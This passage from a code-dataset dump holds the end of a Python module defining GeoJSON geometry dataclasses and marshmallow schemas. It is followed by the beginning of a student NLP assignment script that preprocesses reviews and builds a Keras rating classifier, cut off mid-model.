[-157.97, 21.46]], bbox=[-157.97, 19.61, -155.52, 21.46])\n >>> geojson.dumps(geojson_points)\n '{\"type\": \"MultiPoint\", \"coordinates\": [[-155.52, 19.61], [-156.22, 20.74], [-157.97, 21.46]], \"bbox\": [-157.97, 19.61, -155.52, 21.46]}'\n >>> geojson_points.shape\n \n\n .. seealso::\n - https://geojson.org/schema/MultiPoint.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.3\n \"\"\"\n\n type: str = \"MultiPoint\"\n coordinates: List[List[float]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.MultiPoint(self.coordinates)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.MultiPoint:\n return self._shape\n\n\nclass GeoJsonMultiPointSchema(Schema):\n \"\"\"\n A GeoJSON MultiPoint schema in 2D coordinates\n\n .. 
code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonMultiPoint\n from geoschema.geojson_schemas import GeoJsonMultiPointSchema\n\n multi_point = geojson.MultiPoint(\n [(-155.52, 19.61), (-156.22, 20.74), (-157.97, 21.46)]\n )\n assert isinstance(multi_point, geojson.geometry.MultiPoint)\n assert isinstance(multi_point, dict) # it is also a dict\n schema = GeoJsonMultiPointSchema()\n geojson_points = schema.load(multi_point) # load a geojson dict\n assert isinstance(geojson_points, GeoJsonMultiPoint)\n geojson_dump = geojson.dumps(multi_point)\n geojson_points = schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_points, GeoJsonMultiPoint)\n serialized = geojson.dumps(geojson_points)\n\n .. seealso::\n - https://geojson.org/schema/MultiPoint.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.3\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"MultiPoint\"), required=True)\n coordinates = fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonMultiPoint:\n return GeoJsonMultiPoint(**data)\n\n\n@dataclass\nclass GeoJsonLineString(GeoJsonGeometry):\n \"\"\"\n A GeoJSON line string in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonLineString\n\n >>> data = {\"type\": \"LineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]]}\n >>> geojson_line = GeoJsonLineString(**data)\n >>> geojson_line\n GeoJsonLineString(type='LineString', coordinates=[[8.919, 44.4074], [8.923, 44.4075]], bbox=[8.919, 44.4074, 8.923, 44.4075])\n >>> geojson.dumps(geojson_line)\n '{\"type\": \"LineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]], \"bbox\": [8.919, 44.4074, 8.923, 44.4075]}'\n >>> geojson_line.shape\n \n\n .. seealso::\n - https://geojson.org/schema/LineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.4\n \"\"\"\n\n type: str = \"LineString\"\n coordinates: List[List[float]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.LineString(self.coordinates)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.LineString:\n return self._shape\n\n\nclass GeoJsonLineStringSchema(Schema):\n \"\"\"\n A GeoJSON line string schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonLineString\n from geoschema.geojson_schemas import GeoJsonLineStringSchema\n\n line_string = geojson.LineString([(8.919, 44.4074), (8.923, 44.4075)])\n assert isinstance(line_string, geojson.geometry.LineString)\n assert isinstance(line_string, dict) # it is also a dict\n geojson_dump = geojson.dumps(line_string)\n schema = GeoJsonLineStringSchema()\n geojson_line = schema.load(line_string) # load a geojson dict\n assert isinstance(geojson_line, GeoJsonLineString)\n geojson_line = schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_line, GeoJsonLineString)\n serialized = geojson.dumps(geojson_line)\n\n .. 
seealso::\n - https://geojson.org/schema/LineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.4\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"LineString\"), required=True)\n coordinates = fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=2),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonLineString:\n return GeoJsonLineString(**data)\n\n\n@dataclass\nclass GeoJsonMultiLineString(GeoJsonGeometry):\n \"\"\"\n A GeoJSON MultiLineString in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonMultiLineString\n\n >>> data = {\"type\": \"MultiLineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]]}\n >>> geojson_line = GeoJsonMultiLineString(**data)\n >>> geojson_line\n GeoJsonMultiLineString(type='MultiLineString', coordinates=[[8.919, 44.4074], [8.923, 44.4075]], bbox=[8.919, 44.4074, 8.923, 44.4075])\n >>> geojson.dumps(geojson_line)\n '{\"type\": \"MultiLineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]], \"bbox\": [8.919, 44.4074, 8.923, 44.4075]}'\n >>> geojson_line.shape\n \n\n .. seealso::\n - https://geojson.org/schema/MultiLineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.5\n \"\"\"\n\n type: str = \"MultiLineString\"\n coordinates: List[List[List[float]]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.MultiLineString(self.coordinates)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.MultiLineString:\n return self._shape\n\n\nclass GeoJsonMultiLineStringSchema(Schema):\n \"\"\"\n A MultiLineString composed of a list of line strings in 2D coordinates\n\n .. code-block::\n\n multi_line = geojson.MultiLineString(\n [\n [(3.75, 9.25), (-130.95, 1.52)],\n [(23.15, -34.25), (-1.35, -4.65), (3.45, 77.95)],\n ]\n )\n assert isinstance(multi_line, geojson.geometry.MultiLineString)\n assert isinstance(multi_line, dict) # it is also a dict\n schema = GeoJsonMultiLineStringSchema()\n geojson_lines = schema.load(multi_line) # load a geojson dict\n assert isinstance(geojson_lines, GeoJsonMultiLineString)\n geojson_dump = geojson.dumps(multi_line)\n geojson_lines = schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_lines, GeoJsonMultiLineString)\n serialized = geojson.dumps(geojson_lines)\n\n .. seealso::\n - https://geojson.org/schema/MultiLineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.5\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"MultiLineString\"), required=True)\n coordinates = fields.List(\n fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=2),\n ),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonMultiLineString:\n return GeoJsonMultiLineString(**data)\n\n\n@dataclass\nclass GeoJsonPolygon(GeoJsonGeometry):\n \"\"\"\n A GeoJSON Polygon in 2D coordinates\n\n - For type \"Polygon\", the \"coordinates\" member MUST be an array of\n linear ring coordinate arrays.\n - For Polygons with more than one of these rings, the first MUST be\n the exterior ring, and any others MUST be interior rings. 
The\n exterior ring bounds the surface, and the interior rings (if\n present) bound holes within the surface.\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonPolygon\n\n >>> data = {\"type\": \"Polygon\", \"coordinates\": [[[2.38, 57.322], [23.194, -20.28], [-120.43, 19.15], [2.38, 57.322]], [[-5.21, 23.51], [15.21, -10.81], [-20.51, 1.51], [-5.21, 23.51]]]}\n >>> geojson_polygon = GeoJsonPolygon(**data)\n >>> geojson_polygon\n GeoJsonPolygon(type='Polygon', coordinates=[[[2.38, 57.322], [23.194, -20.28], [-120.43, 19.15], [2.38, 57.322]], [[-5.21, 23.51], [15.21, -10.81], [-20.51, 1.51], [-5.21, 23.51]]], bbox=[-120.43, -20.28, 23.194, 57.322])\n >>> geojson.dumps(geojson_polygon)\n '{\"type\": \"Polygon\", \"coordinates\": [[[2.38, 57.322], [23.194, -20.28], [-120.43, 19.15], [2.38, 57.322]], [[-5.21, 23.51], [15.21, -10.81], [-20.51, 1.51], [-5.21, 23.51]]], \"bbox\": [-120.43, -20.28, 23.194, 57.322]}'\n >>> geojson_polygon.shape\n \n\n .. seealso::\n - https://geojson.org/schema/Polygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.6\n \"\"\"\n\n type: str = \"Polygon\"\n coordinates: List[List[List[float]]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n # the first linear ring of the coordinates must be the exterior ring\n # and the rest of them must be one or more interior rings\n self._shape = shapely.geometry.Polygon(\n self.coordinates[0], self.coordinates[1:]\n )\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.Polygon:\n return self._shape\n\n\nclass GeoJsonPolygonSchema(Schema):\n \"\"\"\n A GeoJSON Polygon schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonPolygon\n from geoschema.geojson_schemas import GeoJsonPolygonSchema\n\n # hole within polygon\n polygon = geojson.Polygon(\n [\n [(2.38, 57.322), (23.194, -20.28), (-120.43, 19.15), (2.38, 57.322)],\n [(-5.21, 23.51), (15.21, -10.81), (-20.51, 1.51), (-5.21, 23.51)],\n ]\n )\n assert isinstance(polygon, geojson.geometry.Polygon)\n assert isinstance(polygon, dict) # it is also a dict\n polygon_schema = GeoJsonPolygonSchema()\n geojson_polygon = polygon_schema.load(polygon) # load a geojson dict\n assert isinstance(geojson_polygon, GeoJsonPolygon)\n geojson_dump = geojson.dumps(polygon)\n geojson_polygon = polygon_schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_polygon, GeoJsonPolygon)\n serialized = geojson.dumps(geojson_polygon)\n\n .. seealso::\n - https://geojson.org/schema/Polygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.6\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"Polygon\"), required=True)\n coordinates = fields.List(\n fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=4),\n ),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonPolygon:\n return GeoJsonPolygon(**data)\n\n\n@dataclass\nclass GeoJsonMultiPolygon(GeoJsonGeometry):\n \"\"\"\n A GeoJSON MultiPolygon in 2D coordinates\n\n .. 
code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonMultiPolygon\n\n >>> data = {\"type\": \"MultiPolygon\", \"coordinates\": [[[[3.78, 9.28], [-130.91, 1.52], [35.12, 72.234], [3.78, 9.28]]], [[[23.18, -34.29], [-1.31, -4.61], [3.41, 77.91], [23.18, -34.29]]]]}\n >>> geojson_polygons = GeoJsonMultiPolygon(**data)\n >>> geojson_polygons\n GeoJsonMultiPolygon(type='MultiPolygon', coordinates=[[[[3.78, 9.28], [-130.91, 1.52], [35.12, 72.234], [3.78, 9.28]]], [[[23.18, -34.29], [-1.31, -4.61], [3.41, 77.91], [23.18, -34.29]]]], bbox=[-130.91, -34.29, 35.12, 77.91])\n >>> geojson.dumps(geojson_polygons)\n '{\"type\": \"MultiPolygon\", \"coordinates\": [[[[3.78, 9.28], [-130.91, 1.52], [35.12, 72.234], [3.78, 9.28]]], [[[23.18, -34.29], [-1.31, -4.61], [3.41, 77.91], [23.18, -34.29]]]], \"bbox\": [-130.91, -34.29, 35.12, 77.91]}'\n >>> geojson_polygons.shape\n \n\n .. seealso::\n - https://geojson.org/schema/MultiPolygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.7\n \"\"\"\n\n type: str = \"MultiPolygon\"\n coordinates: List[List[List[List[float]]]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n polygons = [\n shapely.geometry.Polygon(polygon[0], polygon[1:])\n for polygon in self.coordinates\n ]\n self._shape = shapely.geometry.MultiPolygon(polygons)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.MultiPolygon:\n return self._shape\n\n\nclass GeoJsonMultiPolygonSchema(Schema):\n \"\"\"\n A GeoJSON MultiPolygon schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonMultiPolygon\n from geoschema.geojson_schemas import GeoJsonMultiPolygonSchema\n\n polygons = geojson.MultiPolygon(\n [\n ([(3.78, 9.28), (-130.91, 1.52), (35.12, 72.234), (3.78, 9.28)],),\n ([(23.18, -34.29), (-1.31, -4.61), (3.41, 77.91), (23.18, -34.29)],),\n ]\n )\n assert isinstance(polygons, geojson.geometry.MultiPolygon)\n assert isinstance(polygons, dict) # it is also a dict\n polygon_schema = GeoJsonMultiPolygonSchema()\n geojson_polygons = polygon_schema.load(polygons) # load a geojson dict\n assert isinstance(geojson_polygons, GeoJsonMultiPolygon)\n geojson_dump = geojson.dumps(polygons)\n geojson_polygons = polygon_schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_polygons, GeoJsonMultiPolygon)\n serialized = geojson.dumps(geojson_polygons)\n\n .. 
seealso::\n - https://geojson.org/schema/MultiPolygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.7\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"MultiPolygon\"), required=True)\n coordinates = fields.List(\n fields.List(\n fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=4),\n ),\n ),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonMultiPolygon:\n return GeoJsonMultiPolygon(**data)\n\n\nGEOMETRY_SCHEMAS = [\n GeoJsonPointSchema(),\n GeoJsonLineStringSchema(),\n GeoJsonPolygonSchema(),\n GeoJsonMultiPointSchema(),\n GeoJsonMultiLineStringSchema(),\n GeoJsonMultiPolygonSchema(),\n]\n\nGEOMETRY_TYPES = [\n GeoJsonPoint,\n GeoJsonLineString,\n GeoJsonPolygon,\n GeoJsonMultiPoint,\n GeoJsonMultiLineString,\n GeoJsonMultiPolygon,\n]\n\n\ndef parse_geometry(\n geometry: Dict,\n) -> Union[\n None,\n GeoJsonGeometry,\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n]:\n if isinstance(geometry, GeoJsonGeometry):\n return geometry\n\n if isinstance(geometry, str):\n geometry = geojson.loads(geometry)\n\n if isinstance(geometry, Dict):\n for schema in GEOMETRY_SCHEMAS:\n try:\n return schema.load(geometry)\n except ValidationError:\n pass\n\n LOGGER.warning(\"Unknown geometry: %s\", geometry)\n\n\ndef parse_geometries(\n geometries: List,\n) -> List[\n Union[\n None,\n GeoJsonGeometry,\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n ]\n]:\n shapes = map(parse_geometry, geometries)\n return [shape for shape in shapes if shape is not None]\n\n\nclass GeoJsonGeometryField(fields.Field):\n \"\"\"\n A GeoJSON Geometry Field\n \"\"\"\n\n def _serialize(self, value, attr, obj, **kwargs) -> Dict:\n \"\"\"\n Serialize a GeoJSON Geometry Field into a GeoJSON Dict\n\n :param value: value is assumed to be a GeoJSON Geometry Field\n :param attr:\n :param obj:\n :param kwargs:\n :return: GeoJSON Dict representation for the Geometry Field\n \"\"\"\n if isinstance(value, GeoJsonGeometry):\n return value.to_dict()\n return geojson.loads(geojson.dumps(value))\n\n def _deserialize(\n self, value, attr, data, **kwargs\n ) -> Union[\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n ]:\n \"\"\"\n Parse a GeoJSON Geometry string into a GeoJSON Geometry Field\n\n :param value: value is assumed to be a GeoJSON Geometry string\n :param attr:\n :param obj:\n :param kwargs:\n :return: any one of the GeoJSON Geometry Field types\n \"\"\"\n try:\n geometry = parse_geometry(value)\n if geometry is None:\n raise ValueError(\"Unknown geometry data.\")\n return geometry\n except ValueError as error:\n raise ValidationError(\"Unknown geometry data.\") from error\n\n\n@dataclass\nclass GeoJsonGeometryCollection:\n \"\"\"\n A GeoJSON GeometryCollection in 2D coordinates\n\n .. 
code-block::\n\n        >>> import geojson\n        >>> from geoschema.geojson_schemas import GeoJsonGeometryCollection\n\n        >>> data = {\n                \"type\": \"GeometryCollection\",\n                \"geometries\": [\n                    {\n                        \"type\": \"Point\",\n                        \"coordinates\": [-115.81, 37.24]\n                    },\n                    {\n                        \"type\": \"LineString\",\n                        \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]\n                    }\n                ]\n            }\n        >>> geo_collection = GeoJsonGeometryCollection(**data)\n        >>> assert isinstance(geo_collection, GeoJsonGeometryCollection)\n        >>> geojson.dumps(geo_collection)\n        '{\"type\": \"GeometryCollection\", \"geometries\": [{\"type\": \"Point\", \"bbox\": [-115.81, 37.24, -115.81, 37.24], \"coordinates\": [-115.81, 37.24]}, {\"type\": \"LineString\", \"bbox\": [-152.62, 10.69, 5.21, 51.21], \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]}], \"bbox\": [-152.62, 10.69, 5.21, 51.21]}'\n        >>> geo_collection.shape\n        <shapely.geometry.collection.GeometryCollection object at 0x...>\n\n\n    .. seealso::\n        - https://geojson.org/schema/GeometryCollection.json\n        - https://tools.ietf.org/html/rfc7946#section-3.1.8\n    \"\"\"\n\n    type: str = \"GeometryCollection\"\n    geometries: List[\n        Union[\n            str,\n            GeoJsonGeometry,\n            GeoJsonPoint,\n            GeoJsonMultiPoint,\n            GeoJsonLineString,\n            GeoJsonMultiLineString,\n            GeoJsonPolygon,\n            GeoJsonMultiPolygon,\n        ]\n    ] = None\n    bbox: List[float] = None\n\n    def __post_init__(self):\n        self.geometries = parse_geometries(self.geometries)\n        shapes = [s.shape for s in self.geometries]\n        self._shape = shapely.geometry.GeometryCollection(shapes)\n        self.bbox = list(self._shape.bounds)\n\n    @property\n    def __geo_interface__(self) -> Dict:\n        return self.to_dict()\n\n    @property\n    def shape(self) -> shapely.geometry.GeometryCollection:\n        return self._shape\n\n    def to_dict(self) -> Dict:\n        return {\"type\": self.type, \"geometries\": self.geometries, \"bbox\": self.bbox}\n\n\nclass GeoJsonGeometryCollectionSchema(Schema):\n    \"\"\"\n    A GeoJSON GeometryCollection schema in 2D coordinates\n\n    .. code-block::\n\n        >>> import geojson\n        >>> from geoschema.geojson_schemas import GeoJsonGeometryCollection\n        >>> from geoschema.geojson_schemas import GeoJsonGeometryCollectionSchema\n\n        >>> data = {\n                \"type\": \"GeometryCollection\",\n                \"geometries\": [\n                    {\n                        \"type\": \"Point\",\n                        \"coordinates\": [-115.81, 37.24]\n                    },\n                    {\n                        \"type\": \"LineString\",\n                        \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]\n                    }\n                ]\n            }\n        >>> schema = GeoJsonGeometryCollectionSchema()\n        >>> geo_collection = schema.load(data)  # load a geojson dict\n        >>> assert isinstance(geo_collection, GeoJsonGeometryCollection)\n        >>> geojson.dumps(geo_collection)\n        '{\"type\": \"GeometryCollection\", \"geometries\": [{\"type\": \"Point\", \"bbox\": [-115.81, 37.24, -115.81, 37.24], \"coordinates\": [-115.81, 37.24]}, {\"type\": \"LineString\", \"bbox\": [-152.62, 10.69, 5.21, 51.21], \"coordinates\": [[-152.62, 51.21], [5.21, 10.69]]}], \"bbox\": [-152.62, 10.69, 5.21, 51.21]}'\n\n\n    .. 
seealso::\n - https://geojson.org/schema/GeometryCollection.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.8\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"GeometryCollection\"), required=True)\n # geometries = fields.List(fields.Dict(), many=True, required=True)\n geometries = fields.List(GeoJsonGeometryField(), required=True)\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonGeometryCollection:\n return GeoJsonGeometryCollection(**data)\n\n\n@dataclass\nclass GeoJsonFeature:\n type: str = \"Feature\"\n geometry: Union[\n Dict,\n GeoJsonPoint,\n GeoJsonMultiPoint,\n GeoJsonLineString,\n GeoJsonMultiLineString,\n GeoJsonPolygon,\n GeoJsonMultiPolygon,\n ] = None\n properties: Dict = None\n\n def __post_init__(self):\n self.geometry = parse_geometry(self.geometry)\n self.bbox = list(self.geometry.shape.bounds)\n\n @property\n def __geo_interface__(self) -> Dict:\n return {\n \"type\": self.type,\n \"geometry\": self.geometry,\n \"properties\": self.properties,\n }\n\n @property\n def shape(\n self,\n ) -> Union[\n shapely.geometry.Point,\n shapely.geometry.MultiPoint,\n shapely.geometry.LineString,\n shapely.geometry.MultiLineString,\n shapely.geometry.Polygon,\n shapely.geometry.MultiPolygon,\n ]:\n return self.geometry.shape\n\n\nclass GeoJsonFeatureSchema(Schema):\n id = fields.Str() # optional\n type = fields.Str(required=True, validate=validate.Equal(\"Feature\"))\n # geometry = fields.Dict(required=True)\n geometry = GeoJsonGeometryField(required=True)\n properties = fields.Dict(required=True)\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonFeature:\n return GeoJsonFeature(**data)\n\n\n@dataclass\nclass GeoJsonFeatureCollection:\n type: str = \"FeatureCollection\"\n features: List[Union[Dict, GeoJsonFeature]] = None\n\n @property\n def __geo_interface__(self) -> Dict:\n return self.to_dict()\n\n @property\n def shapes(\n self,\n ) -> List[\n Union[\n shapely.geometry.Point,\n shapely.geometry.MultiPoint,\n shapely.geometry.LineString,\n shapely.geometry.MultiLineString,\n shapely.geometry.Polygon,\n shapely.geometry.MultiPolygon,\n ]\n ]:\n return [f.geometry.shape for f in self.features]\n\n def to_dict(self) -> Dict:\n return {\"type\": self.type, \"features\": self.features}\n\n\nclass GeoJsonFeatureCollectionSchema(Schema):\n type = fields.Str(required=True, validate=validate.Equal(\"FeatureCollection\"))\n features = fields.Nested(GeoJsonFeatureSchema(many=True), required=True)\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonFeatureCollection:\n return GeoJsonFeatureCollection(**data)\n","repo_name":"dazza-codes/geoschema","sub_path":"geoschema/geojson_schemas.py","file_name":"geojson_schemas.py","file_ext":"py","file_size_in_byte":29155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39747919303","text":"# ADD THE LIBRARIES YOU'LL NEED\nimport pandas as pd\nfrom keras import Input\nfrom keras.layers import Dropout\nfrom keras.layers import Dense\nfrom gensim.models import FastText\nimport fasttext\nimport fasttext.util\nfrom tensorflow.keras import Sequential\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import LSTM\nfrom keras.layers import Flatten\nfrom keras.initializers import Constant\nfrom keras.models import model_from_json\nimport tensorflow as tf\nfrom imblearn.under_sampling import RandomUnderSampler\nfrom keras.preprocessing import 
sequence\nimport numpy as np\nimport nltk\nimport json\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nfrom keras.layers import Activation\nfrom keras import backend as K\nfrom gensim.models import Word2Vec\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nimport imblearn\nfrom imblearn.over_sampling import RandomOverSampler\n#from sklearn.utils import class_weight\n#from imblearn.over_sampling import SMOTE\n'''\nAbout the task:\n\nYou are provided with a codeflow- which consists of functions to be implemented(MANDATORY).\n\nYou need to implement each of the functions mentioned below, you may add your own function parameters if needed(not to main).\nExecute your code using the provided auto.py script(NO EDITS PERMITTED) as your code will be evaluated using an auto-grader.\n'''\n\nvocab_embedding=dict()\n\ndef over_sample_data(train):\n    oversample = RandomOverSampler(random_state=777)\n    X_over, y_over = oversample.fit_resample(train[['reviews','ratings']], train['ratings'])\n    #print(len(y_over))\n    #X_over,y_over=smote.fit_sample(train['reviews'],train['ratings'])\n    #X_over, y_over = undersample.fit_resample(train[['reviews','ratings']], train['ratings'])\n    columnnames=['reviews','ratings']\n    df = pd.DataFrame(X_over, columns=columnnames)\n    df['ratings'].value_counts()\n    train=df\n    train = train.sample(frac=1).reset_index(drop=True)\n    #reviews=train['reviews']\n    #ratings=train['ratings']\n    return train\n\ndef under_sample_data(train):\n    undersample = RandomUnderSampler(random_state=777)\n    X_over, y_over = undersample.fit_resample(train[['reviews','ratings']], train['ratings'])\n    columnnames=['reviews','ratings']\n    df = pd.DataFrame(X_over, columns=columnnames)\n    df['ratings'].value_counts()\n    train=df\n    train = train.sample(frac=1).reset_index(drop=True)\n    return train\n\n\ndef pre_process_rating(data):\n    ratings = data[\"ratings\"].values.tolist()\n    ratings1=list()\n    for rating in ratings:\n        replace_list=[0,0,0,0,0]\n        replace_list[rating-1]=1\n        ratings1.append(replace_list)\n    ratings=ratings1\n    #ratings=[x-1 for x in ratings]\n    return ratings\n\ndef encode_data(text):\n    reviews=text\n    vocab=dict()\n    for elem in reviews:\n        for words in elem:\n            if words in vocab:\n                vocab[words]+=1\n            else:\n                vocab[words]=1\n    with open('./vocab.json') as json_file: \n        vocab_sorted = json.load(json_file)\n\n    \n    \n    #f=open('/content/drive/MyDrive/NLP_Assignment1/glove.twitter.27B.200d.txt')\n    #for line in f:\n    #    line=line.split(' ')\n        #print(line[0])\n    #    vocab_embedding[line[0]]=np.asarray(line[1:],dtype='float32').tolist()\n    reviews1=list()\n    replace_data=list()\n    #print(reviews[0])\n    #print(reviews[100])\n    for elem in reviews:\n        replace_data=list()\n        for word in elem:\n            if(word in vocab_sorted):\n                replace_data.append(vocab_sorted[word])\n        reviews1.append(replace_data)\n    reviews=reviews1\n    return reviews\n    #len(vocab)\n\n    # This function will be used to encode the reviews using a dictionary(created using corpus vocabulary) \n    \n    # Example of encoding :\"The food was fabulous but pricey\" has a vocabulary of 6 words, each one has to be mapped to an integer like: \n    # {'The':1,'food':2,'was':3,'fabulous':4,'but':5,'pricey':6} this vocabulary has to be created for the entire corpus and then be used to \n    # encode the words into integers \n\n    # return encoded examples\n\n\n\ndef convert_to_lower(text):\n    reviews=text\n    reviews1=list()\n    for elem in reviews:\n        
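# lowercase every review so that later vocabulary lookups stay case-insensitive\n        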
reviews1.append(elem.lower())\n reviews=reviews1\n reviews_orignal=reviews\n return reviews \n # return the reviews after convering then to lowercase\n\n\ndef remove_punctuation(text):\n reviews=text\n punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~+=\\`'''\n reviews1=list()\n for elem in reviews:\n for char in elem:\n if(char in punc):\n elem=elem.replace(char,\"\")\n reviews1.append(elem)\n reviews=reviews1\n return reviews\n # return the reviews after removing punctuations\n\n\ndef remove_stopwords(text):\n #stop_words = set(stopwords.words('english')) \n return text\n # return the reviews after removing the stopwords\n\ndef perform_tokenization(text):\n reviews=text\n nltk.download('punkt')\n reviews1=list()\n review=list()\n for elem in reviews:\n print(elem)\n review=word_tokenize(elem)\n reviews1.append(review)\n reviews=reviews1\n return reviews\n # return the reviews after performing tokenization\n\n\ndef perform_padding(data):\n reviews=data\n review_length=29\n print(review_length)\n reviews= sequence.pad_sequences(reviews, maxlen=review_length,padding=\"post\")\n #print(reviews[2])\n #reviews.shape\n return reviews\n # return the reviews after padding the reviews to maximum length\n\ndef preprocess_data(data,is_train=True):\n # make all the following function calls on your data\n # EXAMPLE:->\n \n if(is_train): \n review = data[\"reviews\"].values.tolist()\n else:\n review=data\n review = convert_to_lower(review)\n review = remove_punctuation(review)\n review = remove_stopwords(review)\n review = perform_tokenization(review)\n review = encode_data(review)\n review = perform_padding(review)\n \n return review\n\n\n\ndef softmax_activation(x):\n num=K.exp(x-K.reshape(K.max(x,axis=1),(K.shape(x)[0],1)))\n norm=K.reshape(K.sum(num,axis=1),(K.shape(x)[0],1))\n return num/norm\n # write your own implementation from scratch and return softmax values(using predefined softmax is prohibited)\n\n\n\nclass NeuralNet:\n\n def __init__(self, reviews, ratings):\n\n self.reviews = reviews\n self.ratings = ratings\n\n\n\n def build_nn(self):\n with open('./vocab.json') as json_file: \n vocab_sorted = json.load(json_file)\n vocab_size=len(vocab_sorted)\n #vocab=model\n vocab_embedding = fasttext.load_model('./crawl-300d-2M-subword/crawl-300d-2M-subword.bin')\n embedding_dim=300\n embedding_matrix=np.zeros((vocab_size+1, embedding_dim))\n i=1\n for words in vocab_sorted:\n #print(vocab_sorted['intelligent'])\n vector=vocab_embedding.get_word_vector(word=words)\n #vector=vocab.get(word)\n #if word in vocab.wv.vocab:\n # vector=vocab[word]\n if vector is not None:\n embedding_matrix[i]=vector\n i+=1\n #print(embedding_matrix[18])\n #print(embedding_matrix[19])\n #print(vocab)\n\n self.model = Sequential()\n self.model.add(Input(shape=(29,)))\n self.model.add(Embedding(vocab_size+1,embedding_dim,input_length=29,trainable=True,embeddings_initializer=Constant(embedding_matrix)))\n #model.add(Embedding(vocab_size+1,embedding_dim,input_length=1000))\n #model.add(LSTM(100))\n self.model.add(Dropout(0.7))\n self.model.add(Flatten())\n self.model.add(Dense(50,activation='sigmoid'))\n self.model.add(Dropout(0.5))\n #model.add(Dense(70,activation='sigmoid'))\n #model.add(Dropout(0.5))\n #model.add(Dense(25,activation='relu'))\n #model.add(Dropout(0.5))\n 